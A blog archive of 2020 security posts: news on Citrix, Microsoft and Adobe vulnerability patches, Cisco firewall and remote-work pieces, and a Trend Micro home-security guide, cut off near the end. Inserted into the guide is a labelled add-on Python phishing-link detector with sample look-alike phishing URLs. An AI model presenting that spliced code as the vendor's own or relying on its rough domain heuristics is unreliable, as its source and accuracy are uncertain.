Category Archives: security

Citrix fixed flaws in XenMobile that will be likely exploited soon

Citrix addressed multiple vulnerabilities in Citrix Endpoint Management (XenMobile) that can be exploited by an attacker to gain administrative privileges on affected systems.

The Citrix Endpoint Management (CEM), formerly XenMobile, is software that provides mobile device management (MDM) and mobile application management (MAM).

The vulnerabilities affecting Citrix XenMobile are tracked as CVE-2020-8208, CVE-2020-8209, CVE-2020-8210, CVE-2020-8211, and CVE-2020-8212. Citrix confirmed that these flaws could be chained to allow a remote, unauthenticated attacker to gain administrative control of a Citrix Endpoint Management (CEM) server.

The impact of the issues depends on the specific version of the software. The vulnerabilities impacting XenMobile server 10.12 before RP2, 10.11 before RP4, 10.10 before RP6, and all versions before 10.9 RP5 have been rated as critical. For XenMobile Server versions 10.12 before RP3, 10.11 before RP6, 10.10 before RP6, and releases prior to 10.9 RP5, the issues have been rated medium or low.

“Today we posted a Security Bulletin covering a set of vulnerabilities in certain on-premises instances of Citrix Endpoint Management (CEM), often referred to as XenMobile Server.” reads the advisory published by Citrix.

“The latest rolling patches that need to be applied for versions 10.9, 10.10, 10.11, and 10.12 are available immediately. Any versions prior to 10.9.x must be upgraded to a supported version with the latest rolling patch.”

The company pre-notified its customers on July 23 and shared details of the issues with national CERTs around the world.

Citrix did not provide technical details on the addressed vulnerabilities and is urging users to upgrade their systems.

“We recommend these upgrades be made immediately. While there are no known exploits as of this writing, we do anticipate malicious actors will move quickly to exploit,” continues the advisory.

The flaws were reported by Andrey Medov of Positive Technologies, Glyn Wintle of Tradecraft, and Kristian Bremberg of Detectify.

Experts pointed out that the flaws aren’t trivial to exploit: to exploit them, attackers first need access to the target network.

Pierluigi Paganini

(SecurityAffairs – hacking, XenMobile)

The post Citrix fixed flaws in XenMobile that will be likely exploited soon appeared first on Security Affairs.

Microsoft August 2020 Patch Tuesday fixed actively exploited zero-days

Microsoft August 2020 Patch Tuesday updates addressed 120 vulnerabilities, including two zero-days that have been exploited in attacks.

Microsoft August 2020 Patch Tuesday updates have addressed 120 flaws, including two zero-day vulnerabilities that have been exploited in attacks in the wild.

The two issues are a Windows spoofing bug and a remote code execution flaw in Internet Explorer.

The Windows spoofing flaw, tracked as CVE-2020-1464, can be exploited by an attacker to bypass security features and load improperly signed files. The flaw stems from Windows incorrectly validating file signatures.

“A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files.” reads the advisory published by Microsoft.

“In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded.”

The flaw affects many Windows OSs, including Windows 7 and Windows Server 2008, for which the IT giant will not provide security updates because they have reached end-of-life.

Microsoft confirmed that threat actors are actively exploiting the issue in attacks against Windows systems, but it did not provide technical details about the attacks.

The second zero-day addressed by Microsoft, tracked as CVE-2020-1380, is a remote code execution issue that affects the scripting engine used by Internet Explorer. The flaw lies in the way the engine handles objects in memory; it could be exploited by tricking victims into visiting a malicious website, by getting them to open a malicious Office document, or through a malvertising attack.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system.”

The RCE vulnerability was discovered by security researchers at Kaspersky.

Microsoft also addressed 15 other critical vulnerabilities that impact Windows, the Edge and Internet Explorer browsers, Outlook, and the .NET Framework. Most of these vulnerabilities are remote code execution issues.

Microsoft August 2020 Patch Tuesday also fixed over 100 vulnerabilities, rated as important, impacting Windows, Dynamics 365, Office, Outlook, SharePoint, and Visual Studio Code. These flaws can be exploited for remote code execution, privilege escalation, XSS attacks, DoS attacks, and to disclose information.

The full list of flaws addressed by Microsoft August 2020 Patch Tuesday is available here.

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft August 2020 Patch Tuesday)

The post Microsoft August 2020 Patch Tuesday fixed actively exploited zero-days appeared first on Security Affairs.

Adobe Acrobat and Reader affected by critical flaws

Adobe has released security updates to address twenty-six vulnerabilities in the Adobe Acrobat, Reader, and Lightroom products.

Adobe has released security updates to address tens of vulnerabilities in Adobe Acrobat, Reader, and Lightroom products.

Eleven out of twenty-six flaws are rated as ‘Critical’ because they could be exploited by attackers to remotely execute arbitrary code or bypass security features on vulnerable computers.

APSB20-48 Security updates available for Adobe Acrobat and Reader

Adobe has released security updates that address 25 vulnerabilities in Adobe Acrobat and Reader products; 11 of them are rated as ‘Critical.’

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by the company.

Below is the list of the addressed issues.

Vulnerability Category | Vulnerability Impact | Severity | CVE Number
--- | --- | --- | ---
Disclosure of Sensitive Data | Memory Leak | Important | CVE-2020-9697
Security bypass | Privilege Escalation | Important | CVE-2020-9714
Out-of-bounds write | Arbitrary Code Execution | Critical | CVE-2020-9693, CVE-2020-9694
Security bypass | Security feature bypass | Critical | CVE-2020-9696, CVE-2020-9712
Stack exhaustion | Application denial-of-service | Important | CVE-2020-9702, CVE-2020-9703
Out-of-bounds read | Information disclosure | Important | CVE-2020-9723, CVE-2020-9705, CVE-2020-9706, CVE-2020-9707, CVE-2020-9710, CVE-2020-9716, CVE-2020-9717, CVE-2020-9718, CVE-2020-9719, CVE-2020-9720, CVE-2020-9721
Buffer error | Arbitrary Code Execution | Critical | CVE-2020-9698, CVE-2020-9699, CVE-2020-9700, CVE-2020-9701, CVE-2020-9704
Use-after-free | Arbitrary Code Execution | Critical | CVE-2020-9715, CVE-2020-9722

APSB20-51 Security update available for Adobe Lightroom

Adobe has released a security update to address a DLL hijacking vulnerability in Adobe Lightroom that could be exploited by an attacker to execute commands with elevated privileges.

“Adobe has released updates for Adobe Lightroom Classic for Windows and macOS. This update addresses an important vulnerability. Successful exploitation could lead to privilege escalation in the context of the current user.” reads the advisory.

An attacker can exploit the flaw to have a malicious DLL loaded when the software launches.

Vulnerability Category | Vulnerability Impact | Severity | CVE Numbers
--- | --- | --- | ---
Insecure Library Loading | Privilege escalation | Important | CVE-2020-9724

Adobe has released Lightroom Classic 9.3 to address the vulnerability.

Users of these products are recommended to upgrade to the latest versions as soon as possible.

Pierluigi Paganini

(SecurityAffairs – hacking, Adobe Acrobat)

The post Adobe Acrobat and Reader affected by critical flaws appeared first on Security Affairs.

Cisco Named a Leader in the 2020 Forrester Wave for Enterprise Firewalls

The firewall has long been foundational to any organization’s security posture. But the antiquated notion of a single network control point no longer works as our applications and data move to the cloud and our users are everywhere. Organizations are augmenting their traditional firewalls with a variety of physical and virtual appliances – some are embedded into the network, others are delivered as a service, are host-based, or even included as native controls within public cloud environments.

At Cisco, we’re aware of the challenges of managing this myriad of security controls needed to protect the modern enterprise. We also understand the issues associated with the rise of mobility and IoT alongside the evolution of 5G and Wi-Fi 6, the adoption of cloud services, workloads and data moving into multiple clouds and SaaS services, and users and things accessing data outside the enterprise perimeter. We’ve been on a journey to simplify and integrate our solutions and provide a more holistic foundation for network security based on the concept we call firewalling. That is, delivering world-class security controls with common policy and threat visibility everywhere you need it.

I’m excited to share that Cisco was named a leader in the just-published report, The Forrester Wave™: Enterprise Firewalls, Q3 2020. In it, Forrester calls out our work integrating the firewall with other technologies: “The vendor’s acquisitions of SourceFire, OpenDNS, and Duo integrate well into its enterprise firewall and associated services. The vendor’s Umbrella platform maps to a Zero Trust edge approach and incorporates major security services, like firewalls and CASBs, that can be cloud-delivered.” Get a copy of Forrester’s report here.

We believe that the superior level of integration between our firewall and other security technologies offers customers seamless interoperability with their existing security infrastructure, including third-party technologies, resulting in unified visibility, automation, more robust defenses, and improved threat efficacy. These capabilities are foundational for organizations looking to adopt a more comprehensive firewalling strategy.

Imagine shared security policies, centralized logging, and threat intelligence across your extended environment. You’ll have a unified firewalling experience with physical and virtualized appliances, the Umbrella cloud-delivered firewall, and even control for applications and workloads with Cisco Tetration. We are uniquely positioned to allow customers to choose the right security controls and offer flexible deployment in their environments. You’ll be prepared to protect:

  • Traditional, cloud, micro-segmented, and de-perimeterized networks
  • Endpoints, with class-leading DNS, EDR, and VPN security
  • Cloud applications, micro-segmentation, and containers

The Cisco firewall portfolio delivers greater protection to your network against advanced and zero-day threats by leveraging features like IPS, Advanced Malware Protection, URL filtering, and sandboxing. These are powered by Cisco Talos, our industry-leading threat intelligence research organization. Talos defends Cisco customers by finding new malware domains, malicious URLs as well as unknown or undisclosed vulnerabilities, and writing rules to help mitigate them. We also offer a variety of management options (cloud-delivered, centralized, and on-box) tailored to meet your environment and business needs.

What’s more, Cisco firewalls now come with Cisco SecureX built-in, unlocking your security products’ full potential across the network, user, endpoint, cloud, and applications. SecureX brings together the various capabilities across our Cisco Security portfolio and third-party technologies, to enable intelligence sharing and coordinated response.

Consider a firewall not as a standalone solution, but as part of an open, integrated platform that will scale to support your organization’s growth and innovation.

Download a copy of The Forrester Wave™: Enterprise Firewalls, Q3 2020 and explore Cisco firewalls.

The post Cisco Named a Leader in the 2020 Forrester Wave for Enterprise Firewalls appeared first on Cisco Blogs.

Adapting to a New Way of Working in 2020

In the spring of 2020, organizations sought to protect their workforce by mandating and enabling their employees to work from home. While necessary for saving lives, this experience physically separated security professionals from their own teams, from the employees who depend on them, and from the systems they’re responsible for. The new work arrangement also placed greater strain on some personnel during an already stressful time.

That’s not to say that we can’t find ways to adapt to this new way of working. In the spirit of this reality, we asked several thought leaders in the industry to share their recommendations on how security teams can make the most of this change and set a strategy that works for the future. Here’s what they had to say.

Cheryl Biswas | Specialist, Cyber Threat Intelligence Program, Global Bank | @3ncr1pt3d | (LinkedIn)

Remote work has been a huge adjustment for many. For some, this has been very isolating. For others, it’s been hard dealing with the uncertainty.

You should set up time with your team or co-workers to meet regularly. We do a daily sync in the mornings. It’s not structured. We can talk about anything including work. It lets us connect with each other, and it’s really strengthened our team.

Also, set a schedule so that work is not all day, every day. Use visual management aids like wall calendars and white boards to track time, deliverables, events, etc. And make sure you take time to get outside, take a walk, get up, and stretch regularly.

Stephanie Ihezukwu | Cloud Security Operations Analyst II at Duo Security, Cisco | @StephandSec | (LinkedIn)

It is 100% normal to not perform as you normally do. This is not normal. We are all reacting to this in different ways. Some of us are lucky enough to be productive during this time. Some of us are barely holding on. Make sure you work WITH yourself, not against yourself. If that means taking time off or speaking with your boss about your struggles, do so.

However, do not stay down for too long. Feelings and emotions only last for 90 seconds. Our thoughts can push them to last a lot longer than that. Give yourself a day or two and then try again.

Also, maintain connections with your colleagues, family, and friends. Try to take regular breaks. Go back to things you used to do for fun but which life has caused you to forget. Get outside. But remember, you need to be well in order to do the awesome work you do, so take care of yourself.

Most importantly, taking your lunch as well as short breaks is crucial for your well-being and sanity. Keep in mind that working remotely (or from home) is a bit different than working remotely during a pandemic, so have patience and don’t be afraid to recalibrate and shift until you find what works for you.

Isiah Jones | Owner & SR ICS OT Cybersecurity Consultant | @blackCyberDude | (LinkedIn)

I’ve spent most of the last six years working remote plus global travel, and much of the last 15 years working with geographically dispersed teams (especially since I came from DoD, including Navy civil service). As a result, I don’t see this as being anything new, special, or different than what has already been shared by many of us for over a decade in terms of security advice.

My advice to people for this time is to use basic sense and start following the advice that has already been around. Don’t overthink and emotionally complicate things. If anything, the move to telework should finally force people to start doing what they should have been doing the last 10 years.

My advice is to follow the security controls and best practices that already exist for mature levels of handling insider threats, access control, change control, configuration management, asset inventory details, as well as secure remote access. (NIST SP 800-53, CIS Top 20 Critical Security Controls, etc.) Don’t make it overly complicated on the ICS side, which is my focus (not IT). It’s the same advice, but they should focus on ISA/IEC 62443 and ISA84 security and safety standard requirements for ICS OT equipment, people, and operations.

Mark Weatherford | Chief Strategy Officer for the National Cybersecurity Center | @marktw | (LinkedIn)

1. Don’t forget that while this situation has caused us to focus intently on tactical challenges, if you are a CISO, your job is also to keep your eye on the strategic direction of the security program. Your CEO might cut you some slack, but your regulator probably won’t.

2. Take advantage of the crisis and lean on your vendors for more support, product upgrades, and better pricing. Most vendors will find a way to work with you rather than potentially lose you as a customer.

3. Remote workers have increased the pressure on security teams to implement more robust endpoint monitoring and identity and access management (IAM) solutions. Use the crisis to get more internal support and budget to move these kinds of initiatives forward.

Jenny Radcliffe | People Hacker & Social Engineer | @Jenny_Radcliffe | (LinkedIn)

As a host of the Human Factor Security Podcast, we pivoted during this time and did the “Lockdown Diaries.” We interviewed a lot of people about what they were doing to cope with this sort of “new normal” through the lockdown period and beyond, and nearly everyone said what really helped them was having a routine.

So, on an individual basis, having a routine helps you cope, helps you get into work mode. It’s very difficult if you don’t have your own space to work in. We’re working from home, and not everyone has a designated office space. So, if companies can take account of that and perhaps not be so rigid as they’re used to being with working hours and other things, that really helps employees.

People can relax into this new way of working. I think we’ll find that people want to work to outcomes and objectives as opposed to the clock. If we can be flexible about how people best fit into this new style of working, I think that would be very helpful for businesses to get the most out of their staff at this time.

Matt Pascucci | Sr. Cyber Security Practice Manager | @MatthewPascucci | (LinkedIn)

Throughout the past couple months, the entire world has made a dramatic shift to how they’re working not only from an employee perspective but also from an operational standpoint. For companies that weren’t geo-diverse before the pandemic, this caused fear and anxiety. There has frequently been the pull to allow flexible work to employees as a perk, but the fear of completely breaking the mold had held institutions back from attempting it. With the pandemic thrusting most of the world on some form of lockdown, we had to evolve.

Some of the major security concerns came from having the threat landscape expanded by having students, children, and spouses all working remotely under their personal wireless network. The lack of full segmentation on these systems allows risks from one system to spread to others, potentially spreading back into their organizations.

With all these changes, I’ve seen companies start focusing on the shifting criticality of externally exposed infrastructure with a solidarity from the security and business teams. As an example, remote access tools like VPNs have become not only a business enabler, but also a critical system to have business continue. These shifts show that we’re adaptable to times of crisis and can securely and effectively work remotely.

There have also been changes to how leadership is required to work with a remote work staff. Many are doing this already, but when a sea change came upon us, the management styles of leaders were put to the test. With proper objectives, results, and oversight, the remote workforce can be just as organized as, if not better than, a typical on-premise office, depending on the function of the employee.

Zoë Rose | Cyber Investigator | @RoseSecOps | (LinkedIn)

To embrace this new way of working, you should look for what works for you. Working remotely/from home/not-office location is about flexibility, inclusion, and creating a space where you’re best supported. For some, that means going to an office, and I believe in the future, that should be available but with a non-mandatory approach.

For others, public transport isn’t feasible. Owning a vehicle isn’t possible and going into the office each and every day doesn’t work. Therefore, creating an office space at home or nearby is perfect.

I like a routine. I get up and make a cuppa, let the ferrets out, sit down, and start things up. This routine helps me in days when I can’t be bothered and days when I’m overwhelmed. However, finding a routine I can stick to wasn’t exactly simple. In a home environment, it requires flat mates to stick to their routine as well, and if I’m honest, I get frustrated when they don’t.

Why is routine so important? Well, it helps me quickly identify the normal in my environment. When things stick out, I question them. At times it’s simply a difference that isn’t threatening. Other times, it’s an event in need of investigation. That routine, behavior, consistency is how I help not-as-technically-minded teammates to identify things that require escalation.

Chloe Messdaghi | VP of Strategy, Point3 Security, Inc. | @ChloeMessdaghi | (LinkedIn)

A majority of breaches happen because employers are not investing in their employees. When we do not invest in our team, we become a threat to ourselves. To support one’s security team, it’s critical to provide ongoing training and support around mental health. Within InfoSec, we have a problem with burnout because we struggle to balance our work and personal life.

As a company or a leader, it is your job to make sure your employees are feeling balanced by providing resources and support. Lastly, remember you wouldn’t have a product if you didn’t have a security team. So, treat them well. Your company depends on it.


Victor Keong | Senior CISO Advisor, Asia Pacific at Cisco | @vkeong | (LinkedIn)

The sudden shift to work from home has brought both opportunities and threats for security leaders. On the opportunities side, we’ve seen some of our CISO customers using the reduced-time-to-decision to accelerate the implementation of certain security solutions, which support organizations’ overall digital transformation.

Equally, we’ve also witnessed an increased review of key security processes such as securely managing remote users and reviewing their access rights, especially privileged users. Working from home also means an introduction of a whole slew of BYOD issues, which warrants a review of BYOD/acceptable use policies as well as a renewed focus on remote device management execution.

On the threats side, bad actors have been taking advantage of COVID-19 in phishing campaigns, but again, this brings an opportunity for anti-phishing awareness and ongoing education to the fore. It also underscores how the education of users on new security implementations is a necessary part of an organization’s digital transformation curriculum.

Tricia A. Howard | Marketing Manager at HolistiCyber | @TriciaKicksSaaS | (LinkedIn)

It’s no secret that this situation has really messed with the way we work these past couple of months. For some of us, it might not be ending anytime soon. Even though things are starting to open back up, companies are realizing that they might not even need a brick-and-mortar office. That means that this “work-from-home” life could become a lot more permanent.

If you find yourself in this scenario, it’s important to have a distinction from your work-from-home life and your home-from-home life. Sometimes, that’s easier said than done.

One of the things that’s helped me a lot is trying to emulate my commute as much as possible both in the morning when I’m starting the day and also when I’m done for the day. By listening to music, listening to a podcast, or walking my dog for around the time that it would normally take for me to get into the office, it helps me mentally prepare for the day and also shut down whenever I am done working. It’s been extremely helpful.

Gabriel Whalen | Principal Field Solution Architect – Information Security at CDW | @Ghostmath1 | (LinkedIn)

Before this year, my recommendation to every organization was to consider implementing a security framework. All too often, there is a focus on having a “blinky box,” rather than testing or implementing non-technical (administrative and physical) security controls. It doesn’t matter if an organization has the best-in-class technical solution if they don’t have visitor access policies, locks on doors, a cadence of reviewing and improving security controls, etc.

The next level is actually executing a business impact analysis and implementing business continuity plans and exercises. Generally speaking, many organizations I speak with are focused on those annual or otherwise required technical tests, but it’s always on my list of proactive recommendations.

Now, I’m definitely hearing that more organizations looking at business continuity are not only preparing for the uncertain, but also increasing awareness of critical asset reliance beyond traditional silos in business units. This is an excellent second-order result of the business impact analysis and business continuity planning and testing, as it really contributes to the maturation of an organization’s security posture and ROI.

Dave Lewis | Global Advisory Chief Information Security Officer, Cisco | @gattaca | (LinkedIn)

We have now arrived at a point in time where this is not the new normal so much as the day-to-day business. Now that we’re moving into the acceptance phase of the way to get work done, we need to make sure we’re keeping a keen eye on three elements, with the human element being primary.

For most people working remotely, this is a completely new experience. Sure, they had taken the occasional Friday, but working as a dedicated remote staffer is another thing entirely. We as security practitioners need to be there to provide guidance more so than in previous years.

The second element to keep in mind is the use of defined, repeatable processes. Having people working remotely will help to draw this need in clear definition. The chance for things to go wrong is compounded by having this lack of face-to-face interactions.

The third element to keep in mind for the remote working force is the democratization of security. We have to be sure to provide security tools such as MFA to our employees that enable them to do their jobs safely and securely.


For additional perspectives on how employees can make the most of remote work, please download Cisco’s eBook, Adjusting to Extraordinary Times: Tips from Cybersecurity Leaders Around the World.

This is a series of blogs sharing insights into how organizations are adapting their cybersecurity strategies during these extraordinary times. Other blogs in the series include: Experiences from Cybersecurity Leaders in Extraordinary Times: Adjustments and Outcomes


The post Adapting to a New Way of Working in 2020 appeared first on Cisco Blogs.

Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World

Welcome to the new normal. We’re all now living in a post-COVID-19 world characterized by uncertainty, mass home working and remote learning. The lines demarcating normal life have shifted abruptly – perhaps never to return. That’s not the worst that can happen, as we all know, but it does mean we all need to get used to new ways of living, working and studying from home. This has major implications for the online safety, security and privacy of our families.

To help you adapt to these new conditions while protecting what matters most, Trend Micro has developed a two-part blog series on “The New Normal.” Part 1 identifies the scope and specific cyber-threats of the new normal. Part 2 provides security tips and products to help address those threats.

What’s going on?

In April, nearly 300 million Americans were estimated to be in government-mandated lockdown. Even as some businesses, municipalities and states begin to relax these rules, experts have warned of subsequent waves of the virus, which could result in new localized lockdowns. In short, a lot of people will continue to work from home, while their children, also at home, attempt to study remotely from their mobile devices.

This has considerable implications for how we spend our time. Without that morning commute to work or school, more of it than ever will involve sitting in front of a desktop, laptop, tablet or smartphone screen. Even the smart TV is enlisted. Dangers include:

  • Use of potentially insecure video conferencing applications. The number of daily meeting participants on Zoom surged from 10 million in December 2019 to roughly 200 million in March.
  • Visits to P2P/torrent sites or platforms for adult content. In search of entertainment, bored kids or teens in your household may have more time and inclination to do this.
  • Downloads of potentially malicious applications disguised as legitimate entertainment or gaming content.
  • More online shopping and banking. June alone generated $73.2 billion in online spend, up 76.2% year-on-year. Whenever you shop or bank online, financial data is potentially exposed.
  • Use of potentially insecure remote learning platforms. Educational mobile app downloads increased by a massive 1087% between March 2 and 16. The trend continues.
  • Logging on to corporate cloud-based services. This includes Office 365, to do your job remotely, or using a VPN to connect directly into the office.
  • For recreation, streaming and browsing on your smart TV. But even your smart TV is vulnerable to threats, as the FBI has warned.

Risky behavior

Unfortunately, the increase in working from home (WFH), especially for those not used to it, may lead to an increase in risky behavior, such as: using non-approved apps for work; visiting non work-related sites on work devices; and using personal devices to access work resources. Recent global Trend Micro research found that:

  • 80% have used their work laptop for personal browsing, with only 36% fully restricting the sites they visit.
  • 56% of employees have used a non-work app on a corporate device, and 66% have uploaded corporate data to it.
  • 39% often or always access corporate data from a personal device.
  • 8% admit to watching adult content on their work laptop, and 7% access the dark web.

This is not about restricting your freedom to visit the sites you want to visit while at home. It’s about reducing the risk of exposing corporate data and systems to possible malware.

What are the bad guys doing?

Unsurprisingly, there has also been a major uptick in the volume of cyber-threats targeting home users. With a captive audience to aim at, it’s a huge opportunity for cyber-criminals to steal your log-ins and personal data to sell to fraudsters, or even to steal corporate passwords and information for a potentially bigger pay-off. They are helped by the fact that many home workers may be more distracted than they usually would be at the office, especially if they have young children. Your kids may even share the same laptops or PCs as you, potentially visiting risky sites and/or downloading unapproved apps.

There’s also a chance that, unless you have a corporate machine at home, your personal computing equipment is less secure than the kit you had in the office. Add to that the fact that support from the IT department may be less forthcoming than usual, given that stretched teams are overwhelmed with requests, while themselves struggling to WFH. One recent report claimed that nearly half (47%) of IT security pros have been taken off some or all of their typical security tasks to support other IT-related jobs. In another, only 59% of respondents said they believe their cybersecurity team has the right tools and resources at home to perform their job effectively.

It’s time to step up and take security into your own hands. Stay on the lookout for the following threats.

  • Unsecured home routers and smart devices might be hijacked in more sophisticated attacks designed to steal data from corporate networks via the home worker.
  • Phishing attacks spoofing well-known brands or using COVID-19 information/news as a lure. Google is blocking 18 million malicious pandemic-themed emails every day. The end goal may be to hijack your online consumer accounts (Netflix, banking, email, online shopping) or work accounts. Other phishing emails are designed to install data-stealing malware, ransomware and other threats.
  • Attackers may target vulnerabilities in your home PCs and the apps you’re using (video conferencing etc) to gain remote access.
  • Business Email Compromise (BEC) attackers may try to leverage the lack of internal communications between remote workers to impersonate senior execs via email, and trick finance team members into wiring corporate funds abroad.
  • Kids exposing home networks and devices to malware on torrent sites, in mobile apps, on social media, and via phishing attacks potentially imitating remote learning/video conferencing platforms.
  • Kids searching for adult/inappropriate content, and/or kids who are bored and over-share on social media. Unicef has warned that millions of children are at increased risk of online harm as lockdown means they spend more of their days online.
  • Mobile apps represent a potential source of malware, especially those found on unofficial app stores. There has also been a reported 51% rise in stalkerware – covert surveillance apps used by domestic abusers and stalkers to target victims.
  • The pandemic has led to a surge in e-commerce fraud where consumers are tricked into buying non-existent products or counterfeit goods including medical items.

So what’s a remote worker/concerned parent to do to protect themselves and the family in the midst of the “new normal?”

Read Part 2 in this mini-series, which we’re publishing simultaneously with Part 1, where we share some best practice advice on how to keep your digital lives and work systems safe from online threats during lockdown—and where we provide tools to help you do just that.

The post Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World appeared first on .

Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World (part 2)

The past few months have seen radical changes to our work and home life under the Coronavirus threat, upending norms and confining millions of American families within just four walls. In this context, it’s not surprising that more of us are spending an increasing portion of our lives online. But this brings with it some familiar cyber-risks. In Part 1 of this mini-series, we explained how cyber-criminals are looking to capitalize on these sweeping changes to society to further their own ends.

Now let’s take a look at what you can do to protect your family, your data, and access to your corporate accounts.

How you can stay safe online

The bad guys are laser-focused on stealing your personal data and log-ins and increasingly see the remote worker as an easy target for leapfrogging into corporate networks. That’s not to mention the potential internet safety risks inherent in bored kids spending more time in front of their screens. To respond, you’ll need to create an equally focused “home security plan” governed by sensible policies and best practices. Here are some of the key areas to consider.

Protect your smart home and router

Increasingly, unprotected smart home devices are being targeted by cyber-criminals to turn into botnets to attack others. They might also provide sophisticated attackers with a stepping-stone into your corporate systems, via the home network. The home router, with its known flaws, is (after the modem) the digital front door to the smart home and the basis for your networking, so it should be first in any security strategy. Consider the following when tackling home network security:

  • Regularly check for router firmware updates and apply them as soon as they’re available. (If you’re using an ISP-supplied home gateway (modem + router), firmware updates are usually pushed by your ISP, so you may not have the option to do this yourself.)
  • Change factory default admin passwords and switch on two-factor authentication if available.
  • Disable UPnP and any remote management features.
  • Use WPA2 (or WPA3, if your router supports it) on your router for encrypted Wi-Fi, and pick a Wi-Fi password that isn’t easily guessed.
  • Put the router in the middle of the house if possible, so the signal is not overly exposed to strangers outside. Likewise for extenders.
  • Invest in security for the entire home network from a reputable provider like Trend Micro.

Secure your home office

Cyber-criminals are primed to take advantage of distracted home workers and potentially less secure PCs/devices. Secure this environment by doing the following:

  • Again, apply a home network security solution. This protects your work devices, while also protecting the devices you use for recreation.
  • Apply any security updates to OS/software.
  • Install/maintain endpoint security software on all machines/devices.
  • Never use work laptops for personal use.
  • Switch on 2FA for any work accounts.
  • Use a VPN if applicable whenever connecting to the office.
  • Stay alert to phishing/BEC attempts.
  • Take advantage of any training courses to stay up-to-speed on the latest scams.
  • Disable macros in Office files – these are often used by hackers to run malware.

Stay safe from phishing

Phishing is the number one tactic used by attackers to trick you into installing malware or handing over your log-ins. Emails, text messages, social media messages and more are spoofed to appear as if sent by a legitimate company or contact. In response:

  • Be cautious of any unsolicited emails/texts/messages even if they appear legitimate.
  • Don’t click on any links/buttons in unsolicited messages, or download attachments.
  • Check directly with the sender rather than clicking through links or buttons provided or entering any confidential details.
  • Invest in cybersecurity tools from a trusted vendor like Trend Micro, to spot and block scam emails and malicious downloads/websites.
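
The link tricks behind most of these phishing emails can be checked mechanically. The following is an added example, not code from the original post or from any Trend Micro product: it pulls every link out of a constructed HTML email and flags the two classic giveaways, visible link text that names one domain while the href goes somewhere else, and look-alike hostnames (a brand name buried inside someone else’s domain, or homoglyph swaps such as rn for m). The TRUSTED allowlist, the HOMOGLYPHS table and SAMPLE_EMAIL are my assumptions; registered_domain() keeps only the last two labels, so it is wrong for suffixes like co.uk.

```python
"""Flag the link tricks phishing emails rely on (added example, stdlib only)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the brands you actually deal with; a real deployment would load this.
TRUSTED = {"paypal.com", "netflix.com", "microsoft.com"}
# Assumption: a small homoglyph table (left side is what attackers type to imitate the right).
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]

# Constructed sample email, not a real message.
SAMPLE_EMAIL = """<p>Your account is on hold.</p>
<a href="http://paypal.com.login-verify.net/x">https://www.paypal.com/myaccount</a>
<a href="https://rnicrosoft.com/reset">Reset password</a>
<a href="https://www.netflix.com/YourAccount">Update payment</a>
<a href="file://server/share/invoice.html">invoice</a>
"""


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:  # only text inside an open <a>
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Crude 'registrable domain': last two labels (ignores public suffixes like co.uk)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def normalise(name):
    """Undo common homoglyph substitutions so rnicrosoft.com compares equal to microsoft.com."""
    name = name.lower()
    for fake, real in HOMOGLYPHS:
        name = name.replace(fake, real)
    return name


def classify_link(href, text):
    """Return the reasons a link is suspicious; an empty list means it looks fine."""
    reasons = []
    url = urlparse(href)
    if url.scheme not in ("http", "https"):
        return [f"non-web scheme {url.scheme!r}"]
    host = (url.hostname or "").lower()
    target = registered_domain(host)
    # 1. The visible text names a domain that is not where the href actually goes.
    for shown in re.findall(r"[a-z0-9.-]+\.[a-z]{2,}", text.lower()):
        if registered_domain(shown) != target:
            reasons.append(f"text says {shown} but link goes to {host}")
    # 2. The hostname borrows a trusted brand without belonging to it.
    if target not in TRUSTED:
        for brand in sorted(TRUSTED):
            label = brand.split(".")[0]
            if normalise(target) == brand:
                reasons.append(f"look-alike of {brand}: {target}")
            elif label in normalise(host):
                reasons.append(f"{label} appears inside {host}, which belongs to {target}")
    return reasons


def scan_email_html(html):
    """Map each href in an HTML email body to its list of suspicion reasons."""
    parser = LinkExtractor()
    parser.feed(html)
    return {href: classify_link(href, text) for href, text in parser.links}


if __name__ == "__main__":
    for href, reasons in scan_email_html(SAMPLE_EMAIL).items():
        print(href, "->", reasons or "ok")
```

Running it on the sample flags the PayPal link twice (text/href mismatch, plus the brand sitting on someone else’s domain), the rnicrosoft.com link as a look-alike, the file:// link for its scheme, and lets the genuine netflix.com link through. The same check is worth running on SMS and chat links; the display-text trick is the one users fall for most, because the link looks right until it is hovered.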

Use video conferencing safely

New videoconferencing platforms can introduce risk, especially if you’re not familiar with the default settings. Here’s how to stay safe when video conferencing:

  • Check first for end-to-end encryption.
  • Only download videoconferencing apps from official iOS/Android stores and manufacturer websites.
  • Get familiar with privacy settings. Switch off camera access if you don’t want to appear on-screen.
  • Ensure you’re always on the latest software version.
  • Never click on links/open attachments in messages from unknown contacts.
  • Use a password manager to store long and strong log-ins, and switch on two-factor authentication (2FA) if available.

Stay safe shopping and banking

Next, protect your financial information and stay safe from e-commerce fraud by doing the following:

  • Install AV on all PCs and devices.
  • Always use the latest browser versions and HTTPS sites.
  • Never click through on sensational promos or ads on social media/in emails. Always visit the site directly.
  • Always be cautious: if special offers seem too good to be true, they usually are.
  • Use a secure browser, password manager, and 2FA in your online accounts.
  • Use a VPN app on any device you use to shop or bank.

Think about online safety for kids
